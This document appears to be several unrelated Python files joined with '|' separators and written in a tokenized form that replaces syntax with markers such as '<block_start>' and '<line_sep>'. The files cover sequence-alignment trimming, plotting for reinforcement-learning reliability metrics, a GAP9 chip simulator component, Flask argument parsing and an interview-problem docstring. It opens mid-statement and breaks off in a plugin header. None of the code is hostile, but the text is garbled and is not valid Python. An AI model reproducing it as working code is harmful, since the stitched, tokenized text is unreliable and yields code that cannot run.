range(len(alignment[0][0]))<block_start><if_stmt>alignment[0][0][i]<ne>'-'<block_start>seq_indices.append(seq_indices[i]+1)<block_end><else_stmt><block_start>seq_indices.append(seq_indices[i])<block_end><if_stmt>alignment[0][1][i]<ne>'-'<block_start>msa_indices.append(msa_indices[i]+1)<block_end><else_stmt><block_start>msa_indices.append(msa_indices[i])<block_end><block_end>seq_indices=array(seq_indices)<line_sep>msa_indices=array(msa_indices)<line_sep>alignment=MSA(msa=array([array(list(alignment[0][0])) array(list(alignment[0][1]))]))<line_sep><return>alignment seq_indices msa_indices<block_end><def_stmt>trimAtomsUsingMSA atoms msa **kwargs<block_start>"""This function uses :func:`.alignSequenceToMSA` and has the same kwargs.
:arg atoms: an atomic structure for trimming
:type atoms: :class:`.Atomic`
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
"""<line_sep>aln,idx_1,idx_2=alignSequenceToMSA(atoms msa **kwargs)<line_sep>u,i=unique(idx_2 return_index=<true>)<line_sep>resnums_str=' '.join([str(x)<for>x idx_1[i]])<line_sep>chain=kwargs.get('chain' 'A')<line_sep><return>atoms.select('chain {0} and resnum {1}'.format(chain resnums_str))<block_end>
|
# coding=utf-8
# Copyright 2019 The Authors of RL Reliability Metrics.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for making plots of robustness metric results and statistics."""<import_stmt>datetime<import_stmt>math<import_stmt>os<import_from_stmt>absl logging<import_from_stmt>matplotlib pyplot<as>plt<import_stmt>numpy<as>np<import_from_stmt>rl_reliability_metrics.analysis io_utils_oss<as>io_utils<import_from_stmt>rl_reliability_metrics.analysis plot_utils<import_from_stmt>rl_reliability_metrics.analysis stats<import_from_stmt>rl_reliability_metrics.analysis stats_utils<line_sep># Internal gfile dependencies
HATCH_PATTERNS=('-' '/' '.' 'O' '+' 'o' 'x' '*' '\\')<line_sep>ALGO_COLORS=('r' 'y' 'g' 'b' 'm')<line_sep>MARKERS=('o' 's' 'v' '^' '<' '>')<line_sep>TIMEFRAME_NAMES=['Beginning' 'Middle' 'End']<line_sep>UP_ARROW=r' $\uparrow$'<line_sep>DOWN_ARROW=r' $\downarrow$'<class_stmt>Plotter(object)<block_start>"""Class for making plots of metric results and statistics."""<def_stmt>__init__ self data pvals_dir confidence_intervals_dir n_timeframes algorithms=<none> out_dir=<none> pthresh=0.01 multiple_comparisons_method='benjamini-yekutieli' subplot_axis_labels=<true> make_legend=<false><block_start>"""Initialize Plotter object.
Args:
data: DataDef object containing all the metric results.
pvals_dir: Path to directory containing p-values for comparisons between
pairs of algorithms.
confidence_intervals_dir: Path to directory containing bootstrap
confidence intervals.
n_timeframes: Total number of timeframes we are dividing each run into.
algorithms: If specified, these algorithms will be plotted, in this order.
If None, we plot all algorithms available in the data (order not
guaranteed).
out_dir: Path to directory where we save the plot images. If None, we
simply display the images without saving.
pthresh: p-value threshold for significance.
multiple_comparisons_method: String indicating method to use for multiple
comparisons correction. See self._do_multiple_comparisons_correction for
options.
subplot_axis_labels: Whether to add x- and y-axis labels for each subplot.
make_legend: Whether to make a legend.
"""<line_sep>self.data_def=data<line_sep>self.pvals_dir=pvals_dir<line_sep>self.confidence_intervals_dir=confidence_intervals_dir<line_sep>self.n_timeframes=n_timeframes<line_sep>self.out_dir=out_dir<line_sep>self.pthresh=pthresh<line_sep>self.multiple_comparisons_method=multiple_comparisons_method<line_sep>self.subplot_axis_labels=subplot_axis_labels<line_sep>self.make_legend=make_legend<line_sep># Parse information from data_def
self.dataset=self.data_def.dataset<line_sep>self.algorithms=algorithms<if>algorithms<else>self.data_def.algorithms<line_sep>self.n_algo=len(self.algorithms)<line_sep>self.n_task=len(self.data_def.tasks)<line_sep># Bonferroni-corrected p-value threshold
self.pthresh_corrected=stats_utils.multiple_comparisons_correction(self.n_algo self.pthresh self.multiple_comparisons_method)<block_end><def_stmt>make_plots self metric<block_start>"""Make all plots for a given metric.
Args:
metric: String name of the metric.
"""<line_sep>plot_utils.paper_figure_configs()<line_sep># Create a metric-specific StatsRunner object
stats_runner=stats.StatsRunner(self.data_def metric self.n_timeframes)<line_sep>result_dims=stats_runner.result_dims<if_stmt>result_dims<eq>'ATRP'# Within-runs metric with eval points.
<block_start>self._make_plots_with_eval_points(metric stats_runner)<block_end><elif_stmt>result_dims<eq>'ATR'# Within-runs metrics without eval points (one value per run).
<block_start>self._make_plots_no_eval_points(metric stats_runner)<block_end><elif_stmt>result_dims<eq>'ATP'# Across-runs metric with eval points
<block_start>self._make_plots_with_eval_points(metric stats_runner)<block_end><else_stmt><block_start><raise>ValueError('plotting not implemented for result_dims: %s'%result_dims)<block_end><block_end><def_stmt>_save_fig self metric plot_name<block_start>timestamp=datetime.datetime.now().strftime('%Y%m%d_%H%M%S_%f')<line_sep>filepath=os.path.join(self.out_dir '%s__%s__%s.png'%(metric plot_name timestamp))<line_sep>io_utils.makedirs(os.path.dirname(filepath))<with_stmt>open(filepath 'wb')<as>f<block_start>plt.savefig(f)<block_end>logging.info('Plot output to: %s' filepath)<block_end><def_stmt>_make_plots_with_eval_points self metric stats_runner<block_start>"""Make plots for a metric evaluated at multiple evaluation points per run.
e.g. 'ATP' or 'ATRP' metrics.
Plot 1: raw metric values per task.
* One subplot per task.
* Each subplot contains a plot showing the metric values across evaluation
points. For ATRP metrics, we show the median metric values and fill plots
indicating the IQR at each evaluation point.
Plot 2: Mean rankings across tasks.
* One subplot per timeframe.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""<line_sep># Set up figure for per-task raw values.
subplot_ncol_1=4<line_sep>n_subplots_1=self.n_task+1<if>self.make_legend<else>self.n_task<line_sep>subplot_nrow_1=math.ceil(n_subplots_1/subplot_ncol_1)<line_sep>fig1=plt.figure(figsize=(4<times>subplot_ncol_1 4<times>subplot_nrow_1))<line_sep># Set up figure for mean rankings.
subplot_ncol_2=self.n_timeframes<if_stmt>self.make_legend<block_start>subplot_ncol_2<augadd>1<block_end>subplot_nrow_2=1<line_sep>fig2=plt.figure(figsize=(4<times>subplot_ncol_2 4<times>subplot_nrow_2))<line_sep>##=== Plot 1: Raw metric values per task ===##
plt.figure(fig1.number)<line_sep>eval_point_idxs=stats_runner.get_timeframe_points(<none>)<line_sep>eval_point_values=self.data_def.metric_params[metric]['eval_points']<line_sep>metric_results=stats_runner.load_metric_results(self.algorithms eval_point_idxs collapse_on_timepoints=<false>)<line_sep>result_dims=stats_runner.result_dims<for_stmt>i_task range(self.n_task)<block_start>plt.subplot(subplot_nrow_1 subplot_ncol_1 i_task+1)<line_sep>task_results=np.squeeze(metric_results[: i_task])<if_stmt>len(eval_point_idxs)<eq>1<block_start>task_results=np.expand_dims(task_results -1)<block_end><if_stmt>result_dims<eq>'ATP'# For across-run metrics, we plot a single curve.
<block_start><for_stmt>i_algo range(self.n_algo)<block_start>plt.plot(eval_point_values task_results[i_algo :] marker=MARKERS[i_algo])<block_end><if_stmt>self.subplot_axis_labels<block_start>plt.xlabel('evaluation points' fontsize=16)<line_sep>plt.ylabel('metric values' fontsize=16)<block_end><block_end><elif_stmt>result_dims<eq>'ATRP'# For per-run metrics, we plot the median and IQR across curves.
<block_start><for_stmt>i_algo range(self.n_algo)<block_start>algo_color=ALGO_COLORS[i_algo]<line_sep>task_algo_results=task_results[i_algo]# n_runs x n_eval_points
result_medians=np.median(task_algo_results axis=0)<line_sep>result_quartile1=np.percentile(task_algo_results q=25 axis=0)<line_sep>result_quartile3=np.percentile(task_algo_results q=75 axis=0)<line_sep>plt.plot(eval_point_values result_medians algo_color marker=MARKERS[i_algo])<line_sep>plt.fill_between(eval_point_values result_quartile1 result_quartile3 alpha=0.3 color=algo_color)<block_end><if_stmt>self.subplot_axis_labels<block_start>plt.xlabel('evaluation points' fontsize=16)<line_sep>plt.ylabel('metric values' fontsize=16)<block_end><block_end><else_stmt><block_start><raise>ValueError('result_dims must be ATP or ATRP, not %s'%result_dims)<block_end>plot_utils.simple_axis(plt.gca())<line_sep>plt.title(self.data_def.tasks[i_task])<block_end># plot the legend
<if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow_1 subplot_ncol_1 n_subplots_1)<line_sep>self._lineplot_legend()<block_end>##=== Plot 2: Mean rankings (mean across tasks) ===##
<for_stmt>timeframe range(self.n_timeframes)# Load data for plotting.
<block_start>timeframe_points=stats_runner.get_timeframe_points(timeframe)<line_sep>pvals=self._load_pvals(metric timeframe)<line_sep>confidence_intervals=self._load_confidence_intervals(metric stats_runner timeframe)<line_sep>plt.figure(fig2.number)<line_sep>metric_results=stats_runner.load_metric_results(self.algorithms timeframe_points collapse_on_timepoints=<true>)<line_sep>plt.subplot(subplot_nrow_2 subplot_ncol_2 timeframe+1)<line_sep>self._plot_bars_and_significant_differences(metric_results pvals confidence_intervals stats_runner)<line_sep>plt.title(TIMEFRAME_NAMES[timeframe] fontsize=14)<block_end># plot the legend
<if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow_2 subplot_ncol_2 subplot_ncol_2)<line_sep>self._barplot_legend()<block_end>##=== Wrap up the figures ===##
<for_stmt>fig,plot_name [(fig1 'per-task_raw') (fig2 'mean_rankings')]<block_start><if_stmt>plot_name<eq>'per-task_raw'<block_start>suptitle_suffix=(UP_ARROW<if>stats_runner.bigger_is_better<else>DOWN_ARROW)<block_end><else_stmt><block_start>suptitle_suffix=''<block_end>plt.figure(fig.number plot_name)<line_sep>self._wrap_up_figure(metric plot_name suptitle_suffix)<block_end><block_end><def_stmt>_make_plots_no_eval_points self metric stats_runner<block_start>"""Make plots for a metric without evaluation points (one value per run).
e.g. 'ATR' metrics.
Plot 1: Raw metric values per task.
* One subplot per task.
* Each subplot contains a box-and-whisker plot showing the median metric
values for each algorithm, a box indicating 1st and 3rd quartiles, and
whiskers indicating the minimum and maximum values (excluding outliers,
defined as being outside 1.5x the inter-quartile range from the 1st and 3rd
quartiles).
Plot 2: Mean rankings across tasks.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""<line_sep># Load data for plotting.
metric_results=stats_runner.load_metric_results(self.algorithms timeframe_points=<none>)<line_sep>pvals=self._load_pvals(metric)<line_sep>confidence_intervals=self._load_confidence_intervals(metric stats_runner)<line_sep>##=== Plot 1: Raw metric values per task ===##
# Set up figure.
subplot_ncol=4<line_sep>n_subplot=self.n_task<if_stmt>self.make_legend<block_start>n_subplot<augadd>1<block_end>subplot_nrow=math.ceil(n_subplot/subplot_ncol)<line_sep>plt.figure(figsize=(4<times>subplot_ncol 4<times>subplot_nrow))<line_sep># Plot the raw metric values as box-and-whisker plots.
<for_stmt>i_task range(self.n_task)<block_start>plt.subplot(subplot_nrow subplot_ncol i_task+1)<line_sep>task_results=np.squeeze(metric_results[: i_task :])<line_sep>boxplot=plt.boxplot(task_results.T patch_artist=<true>)<for_stmt>part ['boxes' 'whiskers' 'fliers' 'means' 'medians' 'caps']<block_start>plt.setp(boxplot[part] color='k')<block_end><for_stmt>i_patch,patch enumerate(boxplot['boxes'])<block_start>patch.set(facecolor=ALGO_COLORS[i_patch])<block_end>plt.title(self.data_def.tasks[i_task] fontsize=16)<line_sep>self._configure_axes('Raw metric values')<line_sep>self._extend_ylims_past_zero(task_results)<line_sep>plot_utils.simple_axis(plt.gca())<block_end><if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow subplot_ncol n_subplot)<line_sep>self._barplot_legend()<block_end># Wrap up the figure.
suptitle_suffix=(UP_ARROW<if>stats_runner.bigger_is_better<else>DOWN_ARROW)<line_sep>self._wrap_up_figure(metric plot_name='per-task_raw' suptitle_suffix=suptitle_suffix)<line_sep>##=== Plot 2: Mean rankings (mean across tasks) ===##
# Set up figure.
subplot_ncol=2<if>self.make_legend<else>1<line_sep>subplot_nrow=1<line_sep>plt.figure(figsize=(4<times>subplot_ncol 4<times>subplot_nrow))<line_sep># Plot mean rankings and show statistical differences
plt.subplot(subplot_nrow subplot_ncol 1)<line_sep>self._plot_bars_and_significant_differences(metric_results pvals confidence_intervals stats_runner)<line_sep>plot_utils.simple_axis(plt.gca())<line_sep># plot the legend
<if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow subplot_ncol subplot_ncol)<line_sep>self._barplot_legend()<block_end># Wrap up the figure.
self._wrap_up_figure(metric plot_name='mean_rankings')<block_end><def_stmt>_wrap_up_figure self metric plot_name suptitle_suffix=''<block_start>"""Add suptitle, set tight layout, and save the figure."""<line_sep>plt.suptitle(plot_utils.METRICS_DISPLAY_NAMES[metric]+suptitle_suffix fontsize=14)<line_sep>plt.tight_layout(rect=[0 0.03 1 0.95])<if_stmt>self.out_dir<block_start>self._save_fig(metric plot_name)<block_end><block_end><def_stmt>_load_pvals self metric timeframe=<none><block_start>"""Load previously computed p-values.
Args:
metric: Which metric we are plotting.
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of p-values, with entries {'algo1.algo2': pval}
"""<line_sep>pvals={}<for_stmt>algo1 self.algorithms<block_start><for_stmt>algo2 self.algorithms# Get path to p-value
<block_start>pvals_filepath=('%s/%s_%s_%s'%(self.pvals_dir metric algo1 algo2))<if_stmt>timeframe<is><not><none><block_start>pvals_filepath<augadd>'_%d'%timeframe<block_end># Load the p-value
<with_stmt>open(pvals_filepath 'r')<as>f<block_start>pval=float(f.readline())<block_end>pvals['%s.%s'%(algo1 algo2)]=pval<block_end><block_end>logging.info('P-values loaded:')<line_sep>logging.info(pvals)<line_sep><return>pvals<block_end><def_stmt>_load_confidence_intervals self metric stats_runner timeframe=<none><block_start>"""Load previously computed confidence intervals.
Args:
metric: Which metric we are plotting.
stats_runner: StatsRunner object
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of confidence intervals, with entries
{'algo': [ci_lower, ci_upper]}
"""<line_sep>cis={}<for_stmt>algo self.algorithms# Get path to confidence intervals
<block_start>ci_filepath='%s/%s_%s'%(self.confidence_intervals_dir metric algo)<if_stmt>timeframe<is><not><none><block_start>ci_filepath<augadd>'_%d'%timeframe<block_end># Load the p-value
<with_stmt>open(ci_filepath 'r')<as>f<block_start>line=f.readline()<block_end>ci=list(map(float line.split(',')))<line_sep># Normalize to range (1, n_metrics)
<if_stmt>'R'<in>stats_runner.result_dims<block_start>ci[0]<augdiv>self.data_def.n_runs_per_experiment<line_sep>ci[1]<augdiv>self.data_def.n_runs_per_experiment<block_end>cis[algo]=ci<block_end>logging.info('Confidence intervals loaded:')<line_sep>logging.info(cis)<line_sep><return>cis<block_end><def_stmt>_plot_bars_and_significant_differences self metric_results pvals confidence_intervals stats_runner<block_start>"""For a single timeframe, plot mean rank and show significant differences.
Args:
metric_results: Numpy array with metric values. First two dimensions
should be (n_algorithm, n_task)
pvals: p-values on comparison between each pair of algorithms. A dict with
entries {'algo1.algo2': pvalue}.
confidence_intervals: Confidence intervals on mean rank for each
algorithm. A dict with entries {'algo': [ci_lower, ci_upper]}.
stats_runner: StatsRunner object
"""<line_sep>ymax=1.32<times>(len(self.algorithms))<line_sep>y_pval_lines=0.83<line_sep># First get the rankings across all algos
metric_ranks=stats_runner.rank_per_task(metric_results)<line_sep># Get mean ranks over tasks, for each algo
# (collapse across all other dimensions)
extra_dims=range(1 len(metric_ranks.shape))<line_sep>mean_ranks=np.mean(metric_ranks tuple(extra_dims))<line_sep># Normalize the ranks to range (1, n_algorithms)
<if_stmt>'R'<in>stats_runner.result_dims<block_start>mean_ranks<augdiv>self.data_def.n_runs_per_experiment<block_end># Plot the mean rankings and error bars for each algo
<for_stmt>i_algo,algo enumerate(self.algorithms)<block_start>plot_utils.flipped_errorbar(x=i_algo y=mean_ranks[i_algo] yerr=confidence_intervals[algo] ymax=self.n_algo bar_color=ALGO_COLORS[i_algo] hatch_pattern=HATCH_PATTERNS[i_algo] x_offset=0.6 )<block_end># Rank order the p-values.
<if_stmt>self.multiple_comparisons_method<ne>'bonferroni'# Get subset of the p-values: we don't need the reverse comparisons, and
# we don't need the self comparisons.
<block_start>pvals_subset={}<for_stmt>i_algo,algo1 enumerate(self.algorithms)<block_start><for_stmt>j_algo range(i_algo+1 self.n_algo)<block_start>algo2=self.algorithms[j_algo]<line_sep>algo_str='%s.%s'%(algo1 algo2)<line_sep>pvals_subset[algo_str]=pvals[algo_str]<block_end><block_end>sorted_keys=sorted(pvals_subset key=pvals_subset.get)<line_sep>pval_ranks={key:rank<for>rank,key enumerate(sorted_keys)}<block_end># Plot black bars indicating significant differences.
n_lines_plotted=0<for_stmt>i_algo,algo1 enumerate(self.algorithms)<block_start><for_stmt>j_algo range(i_algo+1 self.n_algo)<block_start>algo2=self.algorithms[j_algo]<line_sep>algo_pair_str='%s.%s'%(algo1 algo2)<if_stmt>self.multiple_comparisons_method<ne>'bonferroni'<block_start>pval_rank=pval_ranks[algo_pair_str]<line_sep>pthresh_corrected=self.pthresh_corrected[pval_rank]<block_end><else_stmt><block_start>pthresh_corrected=self.pthresh_corrected<block_end><if_stmt>pvals[algo_pair_str]<l>pthresh_corrected<block_start>x=[i_algo+1 j_algo+1]<line_sep>y=[(y_pval_lines+n_lines_plotted<times>0.03)<times>ymax]<times>2<line_sep>plt.plot(x y color='k')<line_sep>n_lines_plotted<augadd>1<block_end><block_end><block_end>self._configure_axes('normalized mean rank' range(1 self.n_algo+1) range(self.n_algo 0 -1))<block_end><def_stmt>_configure_axes self y_label y_ticks=<none> y_tick_labels=<none><block_start>"""Configure axis limits and labels."""<line_sep>algo_abbreviations=[plot_utils.ALGO_ABBREVIATIONS[algo]<for>algo self.algorithms]<line_sep>plt.xticks(range(1 self.n_algo+1) algo_abbreviations)<line_sep>plt.xlim(0 len(self.algorithms)+1)<if_stmt>y_ticks<block_start>plt.yticks(y_ticks)<block_end><if_stmt>y_tick_labels<block_start>plt.gca().set_yticklabels(y_tick_labels)<block_end><if_stmt>self.subplot_axis_labels<block_start>plt.xlabel('algorithm' fontsize=16)<line_sep>plt.ylabel(y_label fontsize=16)<block_end>plt.tick_params(top='off')<block_end>@staticmethod<def_stmt>_extend_ylims_past_zero data tolerance=0.01 extension=0.1<block_start>"""Extend y-axis to ensure that zero-values in the data are visible.
Args:
data: Data being plotted.
tolerance: Determines what values are considered too close to zero.
extension: Determines how far to extend the y-axis.
"""<line_sep>ylims_orig=plt.gca().get_ylim()<line_sep>abs_min=np.abs(np.min(data))<line_sep>abs_max=np.abs(np.max(data))<line_sep># Extend below zero.
<if_stmt>abs_min<l>tolerance<times>abs_max<block_start>ylim_lower=-ylims_orig[1]<times>extension<line_sep>plt.ylim([ylim_lower ylims_orig[1]])<block_end># Extend above zero.
<elif_stmt>abs_max<l>tolerance<times>abs_min<block_start>ylim_upper=-ylims_orig[0]<times>extension<line_sep>plt.ylim([ylims_orig[0] ylim_upper])<block_end><block_end><def_stmt>_barplot_legend self<block_start>"""Plot a legend showing the color/texture for each algorithm."""<for_stmt>ibox range(self.n_algo)<block_start>box_y=self.n_algo-ibox<line_sep>plt.scatter(0 box_y s=300 marker='s' facecolor=ALGO_COLORS[ibox] edgecolor='k' hatch=HATCH_PATTERNS[ibox] label=HATCH_PATTERNS[ibox])<line_sep>plt.text(0.008 box_y-0.15 self.algorithms[ibox] fontsize=14)<line_sep>plt.xlim(-0.01 0.05)<block_end>plot_utils.no_axis(plt.gca())<block_end><def_stmt>_lineplot_legend self<block_start>"""Plot a legend showing the color/marker for each algorithm."""<for_stmt>i_algo range(self.n_algo)<block_start>y=self.n_algo-i_algo<line_sep>color=ALGO_COLORS[i_algo]<line_sep>plt.plot([0 2] [y y] color=color)<line_sep>plt.plot(1 y marker=MARKERS[i_algo] color=color)<line_sep>plt.text(2.5 y-0.002 self.algorithms[i_algo] fontsize=14)<block_end>ax=plt.gca()<line_sep>plot_utils.no_axis(ax)<line_sep>ax.set_axis_bgcolor('white')<line_sep>plt.xlim([0 10])<line_sep>plt.ylim([0 self.n_algo+1])<block_end><block_end>
|
#
# Copyright (C) 2020 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>gsystree<as>st<import_from_stmt>gap.gap9.soc Soc<import_from_stmt>gap.gap9.cluster Cluster get_cluster_name<import_from_stmt>ips.clock.clock_domain Clock_domain<import_from_stmt>ips.clock.clock_generator Clock_generator<import_from_stmt>ips.pmu.pmu_v4 Pmu<import_from_stmt>ips.padframe.padframe_v1 Padframe<import_from_stmt>ips.vendors.dolphin.rtc Rtc<class_stmt>Gap9(st.Component)<block_start><def_stmt>__init__ self parent name soc_config_file='gap/gap9/soc.json' cluster_config_file='gap/gap9/cluster.json' padframe_config_file='gap/gap9/padframe.json'<block_start>super(Gap9 self).__init__(parent name)<line_sep>#
# Properties
#
soc_config_file=self.add_property('soc_config_file' soc_config_file)<line_sep>cluster_config_file=self.add_property('cluster_config_file' cluster_config_file)<line_sep>nb_cluster=self.add_property('nb_cluster' 1)<line_sep>#
# Components
#
# Padframe
padframe=Padframe(self 'padframe' config_file=padframe_config_file)<line_sep># Soc clock domain
soc_clock=Clock_domain(self 'soc_clock_domain' frequency=50000000)<line_sep># Clusters clock domains
cluster_clocks=[]<for_stmt>cid range(0 nb_cluster)<block_start>cluster_name=get_cluster_name(cid)<line_sep>cluster_clocks.append(Clock_domain(self cluster_name+'_clock' frequency=50000000))<block_end># Clusters
clusters=[]<for_stmt>cid range(0 nb_cluster)<block_start>cluster_name=get_cluster_name(cid)<line_sep>clusters.append(Cluster(self cluster_name config_file=cluster_config_file cid=cid))<block_end># Soc
soc=Soc(self 'soc' config_file=soc_config_file chip=self cluster=clusters[0])<line_sep># Fast clock
fast_clock=Clock_domain(self 'fast_clock' frequency=24576063<times>2)<line_sep>fast_clock_generator=Clock_generator(self 'fast_clock_generator' powered_on=<false> powerup_time=200000000)<line_sep># Ref clock
ref_clock=Clock_domain(self 'ref_clock' frequency=65536)<line_sep>ref_clock_generator=Clock_generator(self 'ref_clock_generator')<line_sep># PMU
pmu=Pmu(self 'pmu' config_file='gap/gap9/pmu.json')<line_sep># RTC
rtc=Rtc(self 'rtc' **soc.get_property('soc/peripherals/rtc/config'))<line_sep>#
# Bindings
#
# Padframe
self.bind(ref_clock_generator 'clock_sync' padframe 'ref_clock_pad')<line_sep>self.bind(padframe 'ref_clock' soc 'ref_clock')<for_stmt>name,group padframe.get_property('groups').items()<block_start>pad_type=group.get('type')<line_sep>nb_cs=group.get('nb_cs')<line_sep>is_master=group.get('is_master')<line_sep>is_slave=group.get('is_slave')<line_sep>is_dual=group.get('is_dual')<if_stmt>pad_type<eq>'gpio'<block_start>self.bind(padframe name+'_pad' soc name)<block_end><else_stmt><block_start><if_stmt>is_master<block_start>self.bind(soc name padframe name)<if_stmt>is_dual<block_start>self.bind(padframe name+'_in' soc name+'_in')<block_end><block_end><if_stmt>is_slave<block_start>self.bind(padframe name soc name)<if_stmt>is_dual<block_start>self.bind(soc name+'_out' padframe name+'_out')<block_end><block_end><block_end><if_stmt>nb_cs<is><not><none><block_start><for_stmt>cs range(0 nb_cs)<block_start>cs_name=name+'_cs'+str(cs)<line_sep>cs_data_name=name+'_cs'+str(cs)+'_data'<if_stmt>is_master<block_start>self.bind(padframe cs_data_name+'_pad' self cs_data_name)<line_sep>self.bind(padframe cs_name+'_pad' self cs_name)<block_end><if_stmt>is_slave<block_start>self.bind(self cs_data_name padframe cs_data_name+'_pad')<line_sep>self.bind(self cs_name padframe cs_name+'_pad')<block_end><block_end><block_end><else_stmt><block_start><if_stmt>is_master<block_start>self.bind(padframe name+'_pad' self name)<block_end><if_stmt>is_slave<block_start>self.bind(self name padframe name+'_pad')<block_end><block_end><block_end># Soc clock domain
self.bind(soc_clock 'out' soc 'clock')<line_sep># Clusters
<for_stmt>cid range(0 nb_cluster)<block_start>cluster=clusters[cid]<line_sep>self.bind(ref_clock_generator 'clock_sync' cluster 'ref_clock')<line_sep>self.bind(cluster 'dma_irq' soc 'dma_irq')<for_stmt>pe range(0 clusters[0].get_property('nb_pe' int))<block_start>self.bind(soc 'halt_cluster%d_pe%d'%(cid pe) cluster 'halt_pe%d'%pe)<block_end>self.bind(cluster_clocks[cid] 'out' clusters[cid] 'clock')<line_sep>self.bind(soc get_cluster_name(cid)+'_fll' cluster_clocks[cid] 'clock_in')<line_sep>self.bind(soc get_cluster_name(cid)+'_input' clusters[cid] 'input')<line_sep>self.bind(clusters[cid] 'soc' soc 'soc_input')<block_end># Soc
self.bind(soc 'fast_clk_ctrl' fast_clock_generator 'power')<line_sep>self.bind(soc 'ref_clk_ctrl' ref_clock_generator 'power')<line_sep>self.bind(soc 'fll_soc_clock' soc_clock 'clock_in')<line_sep># Fast clock
self.bind(fast_clock 'out' fast_clock_generator 'clock')<line_sep>self.bind(fast_clock_generator 'clock_sync' soc 'fast_clock')<line_sep>self.bind(fast_clock_generator 'clock_ctrl' fast_clock 'clock_in')<line_sep># Ref clock
self.bind(ref_clock 'out' ref_clock_generator 'clock')<line_sep># RTC
self.bind(rtc 'apb_irq' soc 'rtc_apb_irq')<line_sep>self.bind(rtc 'irq' soc 'wakeup_rtc')<line_sep>self.bind(rtc 'event' soc 'rtc_event_in')<line_sep>self.bind(soc 'rtc_input' rtc 'input')<line_sep>self.bind(soc_clock 'out' rtc 'clock')<line_sep>self.bind(ref_clock_generator 'clock_sync' rtc 'ref_clock')<line_sep># PMU
self.bind(soc_clock 'out' pmu 'clock')<line_sep>self.bind(soc 'pmu_input' pmu 'input')<line_sep>self.bind(pmu 'icu6_reset' clusters[0] 'reset')<line_sep>self.bind(pmu 'icu5_reset' soc 'reset')<line_sep>self.bind(ref_clock 'out' pmu 'ref_clock')<line_sep>self.bind(pmu 'event' soc 'event')<line_sep>self.bind(pmu 'scu_ok' soc 'scu_ok')<line_sep>self.bind(pmu 'picl_ok' soc 'picl_ok')<line_sep>self.bind(soc 'wakeup_out' pmu 'wakeup')<line_sep>self.bind(soc 'wakeup_seq' pmu 'wakeup_seq')<line_sep># SOC
self.bind(self 'bootsel' soc 'bootsel')<line_sep>self.bind(fast_clock 'out' soc 'fast_clock_out')<block_end><def_stmt>gen_gtkw_conf self tree traces<block_start><if_stmt>tree.get_view()<eq>'overview'<block_start>self.vcd_group(self skip=<true>)<block_end><else_stmt><block_start>self.vcd_group(self skip=<false>)<block_end><block_end><block_end>
|
# Copyright (c) 2020 the original author or authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
<import_from_stmt>flask Request<import_from_stmt>src.exceptions InvalidRequestArgumentValueError<line_sep>UNDEFINED='__UNDEFINED__'<def_stmt>parse_request_bool_arg name:str default:bool request:Request<arrow>bool<block_start>param_value=request.args.get(name.lower() UNDEFINED).upper()<if_stmt>param_value<eq>UNDEFINED<block_start><return>default<block_end><if_stmt>param_value<in>('TRUE' '1')<block_start><return><true><block_end><elif_stmt>param_value<in>('FALSE' '0')<block_start><return><false><block_end><else_stmt><block_start><raise>InvalidRequestArgumentValueError(f"'{name}' parameter accepts only 'true' (or '1') and 'false' (or '0')")<block_end><block_end><def_stmt>parse_request_string_arg name:str default allowed_values request:Request<arrow>str<block_start>name=name.lower()<line_sep>param_value=request.args.get(name.lower() UNDEFINED).upper()<if_stmt>param_value<eq>UNDEFINED<block_start><return>default<block_end>allowed_values=list(allowed_values)<if_stmt>param_value<not><in>allowed_values<block_start><raise>InvalidRequestArgumentValueError(f"'{name}' parameter accepts only '{', '.join(allowed_values)}' values")<block_end><return>param_value<block_end>
|
"""This problem was asked by Amazon.
Given a pivot x, and a list lst, partition the list into three parts.
• The first part contains all elements in lst that are less than x
• The second part contains all elements in lst that are equal to x
• The third part contains all elements in lst that are larger than x
Ordering within a part can be arbitrary.
For example, given x = 10 and lst = [9, 12, 3, 5, 14, 10, 10], one partition may be `[9, 3, 5, 10, 10, 12, 14].
"""<line_sep>
|
"""
This is an FSLeyes plugin script that integrates AxonDeepSeg tools into FSLeyes.
Author : <NAME>
